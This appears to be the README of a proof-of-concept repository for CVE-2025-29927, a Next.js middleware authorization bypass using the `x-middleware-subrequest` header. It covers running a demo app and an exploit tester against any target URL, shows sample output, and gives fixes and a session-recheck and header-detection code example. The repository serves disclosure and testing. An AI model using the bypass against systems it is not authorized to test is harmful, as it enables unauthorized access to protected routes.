This repository contains a proof of concept (POC) for CVE-2025-29927, a critical vulnerability in Next.js that allows attackers to bypass authorization checks implemented in middleware.
- [Running the POC Application](#running-the-poc-application)
- [Using the Exploit Script](#using-the-exploit-script)
- [How to Fix the Vulnerability](#how-to-fix-the-vulnerability)
- [Vulnerability Details](#vulnerability-details)
## Running the POC Application

This Next.js application demonstrates the vulnerability with a protected dashboard route.

- Clone the repository
- Install and run:

  ```bash
  npm install
  npm run build
  npm run start
  ```

- Access http://localhost:3000 in your browser
- Try accessing the protected dashboard at /dashboard
## Using the Exploit Script

The exploit script can test any Next.js application for this vulnerability.

```bash
npm run exploit <target-url>
# e.g.
npm run exploit http://localhost:3000/dashboard
```

The exploit tool:

- Takes a target URL as input
- Makes a normal request to check if the route is protected
- Attempts to bypass middleware using the `x-middleware-subrequest` header
- Compares responses to determine vulnerability
```
=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Normal request status: 307
Bypass request status: 200
⚠️ VULNERABLE
The route is protected but accessible with the bypass header
```

## How to Fix the Vulnerability

A fix implementation is available in the `how-to-fix` branch.
1. Update Next.js Version (Recommended)

   Update to one of these patched versions:

   - Next.js 15.x → 15.2.3
   - Next.js 14.x → 14.2.25
   - Next.js 13.x → 13.5.9
   - Next.js 12.x → 12.3.5

2. Implement Secondary Validation

   - Add authentication checks in your API routes/pages
   - Don't rely solely on middleware for security
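An added example of the secondary validation described above (this is illustrative code, not code from this repository or from Next.js): the route handler resolves the session from the request's own `Cookie` header instead of trusting anything middleware did, so it still returns 401 when middleware never ran, and a small helper flags inbound requests that carry the internal header so they can be logged or dropped at the proxy. The session store, the `session` cookie name, `dashboardHandler` and `hasInternalHeader` are constructed for this demo.

```javascript
// Added example, not part of the POC repository. Demonstrates the
// "Implement Secondary Validation" fix: the route re-checks the session
// itself, so a request that skipped middleware still gets a 401.
// Session store, cookie name and handler signature are constructed for
// this demo; header names are assumed lowercased, as Node provides them.

// Constructed session store: cookie value -> user record.
const SESSIONS = new Map([["sess-abc123", { user: "alice" }]]);

// Minimal Cookie header parser: "a=1; session=xyz" -> { a: "1", session: "xyz" }.
function parseCookies(cookieHeader) {
  const out = {};
  for (const part of (cookieHeader || "").split(";")) {
    const [name, ...rest] = part.trim().split("=");
    if (name) out[name] = rest.join("=");
  }
  return out;
}

// Resolves the caller's session from the Cookie header alone, never from
// state that middleware may (or may not) have attached to the request.
function getSession(headers) {
  return SESSIONS.get(parseCookies(headers.cookie).session) || null;
}

// Detection aid: x-middleware-subrequest is internal to Next.js, so a
// request arriving from the internet should never carry it. Log such
// requests and strip the header at the reverse proxy before it reaches
// the application.
function hasInternalHeader(headers) {
  return Object.keys(headers).some(
    (h) => h.toLowerCase() === "x-middleware-subrequest"
  );
}

// Route handler for /dashboard that does not rely on middleware at all:
// no valid session cookie means 401, whatever other headers are present.
function dashboardHandler(headers) {
  const session = getSession(headers);
  if (!session) return { status: 401, body: "unauthorized" };
  return { status: 200, body: `welcome ${session.user}` };
}
```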
Sample output when the route is not vulnerable:

```
=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Making request without bypass header...
Making request with bypass header...
Normal request status: 307
Bypass request status: 307
✓ NOT VULNERABLE - Protected Route
The route is protected and the bypass attempt was unsuccessful
Normal request redirected to: /
Bypass request redirected to: /
```

## Vulnerability Details

- CVE ID: CVE-2025-29927
- Affected Versions:
  - 13.0.0 - 13.5.8
  - 14.0.0 - 14.2.24
  - 15.0.0 - 15.2.2
  - 11.1.4 - 12.3.4
Next.js uses an internal header, `x-middleware-subrequest`, to prevent recursive requests. This vulnerability allows attackers to bypass middleware security checks by manipulating this header.

- Impact:
  - Unauthorized access to protected routes
  - Bypass of authentication checks
  - Circumvention of security middleware
- Affected deployments:
  - Self-hosted Next.js applications using Middleware
Want to go further? This CVE is implemented as a flag in OSS OopsSec Store, a deliberately vulnerable lab designed for offensive security training.
👉 Try the challenge here → kOaDT/oss-oopssec-store
This tool is provided for educational and testing purposes only. Only use this tool on systems you own or have explicit permission to test.